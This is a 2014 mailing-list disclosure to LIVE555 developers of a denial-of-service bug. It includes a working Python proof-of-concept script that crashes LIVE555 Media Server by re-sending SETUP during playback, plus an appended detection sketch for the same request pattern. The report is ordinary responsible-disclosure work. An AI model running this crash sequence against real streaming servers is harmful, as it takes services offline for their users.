Ok, here are the details:

DESCRIPTION

An RTSP client can make the LIVE555 Media Server crash by renegotiating transport parameters.

PRODUCTS IMPACTED

LIVE555 Media Server ( http://www.live555.com/mediaServer/ ). At minimum v0.74 (2011.12.23) to the most recent version to date v0.82 (2014.03.16).

TECHNICAL DETAILS

The following sequence of requests causes the DoS:

1. DESCRIBE (optionally)
2. SETUP (e.g. audio track)
3. SETUP (e.g. video track)
4. PLAY
5. SETUP (any of the previously opened tracks)
6. PLAY

Adding a PAUSE request between steps 4 and 5 works around the problem. However, RFC 2326 (RTSP) specifies in chapter “A.2 Server State Machine” that a SETUP request can actually be issued in the “Playing” state.

The following Python script reproduces the vulnerability.

# Python 2 script: str objects are sent and received directly on the socket.
import socket
import re

host = ("172.17.44.20", 554)
url = "rtsp://172.17.44.20/brasilccmovie.mpg"

def send(msg):
    # Append the Session header (once the server has assigned one) and CSeq.
    if (send.session != ''):
        msg += "Session: " + send.session + "\r\n"
    msg += "CSeq: " + str(send.cseq) + "\r\n"
    msg += "\r\n"
    s.send(msg)
    send.cseq += 1
    reply = s.recv(1000)
    # Remember the session id returned by the server for later requests.
    match = re.search('Session: ([^\r;]*)', reply, re.DOTALL)
    if (match):
        send.session = match.group(1)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(0.5)
s.connect(host)
send.session = ''
send.cseq = 1

#send("DESCRIBE " + url + " RTSP/1.0\r\nAccept: application/sdp\r\n")
send("SETUP " + url + "/track1 RTSP/1.0\r\nTransport: RTP/AVP/UDP;unicast;client_port=34000-34001\r\n")
send("SETUP " + url + "/track2 RTSP/1.0\r\nTransport: RTP/AVP/UDP;unicast;client_port=34002-34003\r\n")
send("PLAY " + url + " RTSP/1.0\r\n")
#send("PAUSE " + url + " RTSP/1.0\r\n")
send("SETUP " + url + "/track1 RTSP/1.0\r\nTransport: RTP/AVP/UDP;unicast;client_port=35000-35001\r\n")
send("PLAY " + url + " RTSP/1.0\r\n")
s.close()

From: “Ross Finlayson” [email protected]
To: “LIVE555 Streaming Media - development & use” [email protected]
Sent: Tuesday 15 July 2014 19:58:34
Subject: Re: [Live-devel] DoS in Media Server

Please post the details here. If the issue is significant, then we’ll update the code, and people will be encouraged to upgrade.

Ross Finlayson
Live Networks, Inc.
http://www.live555.com/

live-devel mailing list
[email protected]
http://lists.live555.com/mailman/listinfo/live-devel

--
Yann Fleutot
Stormshield Network Security developer
Arkoon Netasq
49 rue Billancourt - FR 92100 Boulogne-Billancourt
Twitter - LinkedIn - www.stormshield.eu
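A detection-side sketch of the request order described in the report, added here as an example and not part of the original thread or of the LIVE555 code: it walks the client requests of one RTSP connection and reports any SETUP that re-opens an already set-up track while the connection is Playing. Because RFC 2326 allows that SETUP, a hit marks traffic worth watching in front of an affected server rather than a protocol violation; the host name, file name, function names and TEARDOWN handling are assumptions.

```python
import re

# Request line of an RTSP/1.0 request: METHOD SP URL SP RTSP/1.0
REQUEST_LINE = re.compile(r"^([A-Z_]+) (\S+) RTSP/1\.0\r?$", re.MULTILINE)

def find_resetup_while_playing(requests):
    """Return (index, url) for each SETUP that re-opens an already set-up
    track while the connection is Playing (no PAUSE since the last PLAY).
    `requests` holds the raw client requests of one RTSP connection, in order."""
    setup_tracks = set()  # track URLs that already received a SETUP
    playing = False       # True after PLAY, False again after PAUSE
    hits = []
    for index, raw in enumerate(requests):
        match = REQUEST_LINE.match(raw)
        if not match:
            continue      # not a parsable request line: ignore it
        method, url = match.groups()
        if method == "SETUP":
            if playing and url in setup_tracks:
                hits.append((index, url))
            setup_tracks.add(url)
        elif method == "PLAY":
            playing = True
        elif method == "PAUSE":
            playing = False
        elif method == "TEARDOWN":
            # Assumption: a TEARDOWN on a track URL closes that track only,
            # any other URL is treated as closing the whole session.
            if url in setup_tracks:
                setup_tracks.discard(url)
            else:
                setup_tracks.clear()
            playing = playing and bool(setup_tracks)
    return hits

# Constructed sample traffic (hypothetical host and file name).
URL = "rtsp://media.example/sample.mpg"

def request(method, url, cseq, extra=""):
    return "%s %s RTSP/1.0\r\nCSeq: %d\r\n%s\r\n" % (method, url, cseq, extra)

def sample(with_pause):
    """The request order from the report, optionally with the PAUSE workaround."""
    steps = [("SETUP", URL + "/track1"), ("SETUP", URL + "/track2"), ("PLAY", URL)]
    if with_pause:
        steps.append(("PAUSE", URL))
    steps += [("SETUP", URL + "/track1"), ("PLAY", URL)]
    return [request(m, u, i + 1) for i, (m, u) in enumerate(steps)]

if __name__ == "__main__":
    print(find_resetup_while_playing(sample(with_pause=False)))
    print(find_resetup_while_playing(sample(with_pause=True)))
```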
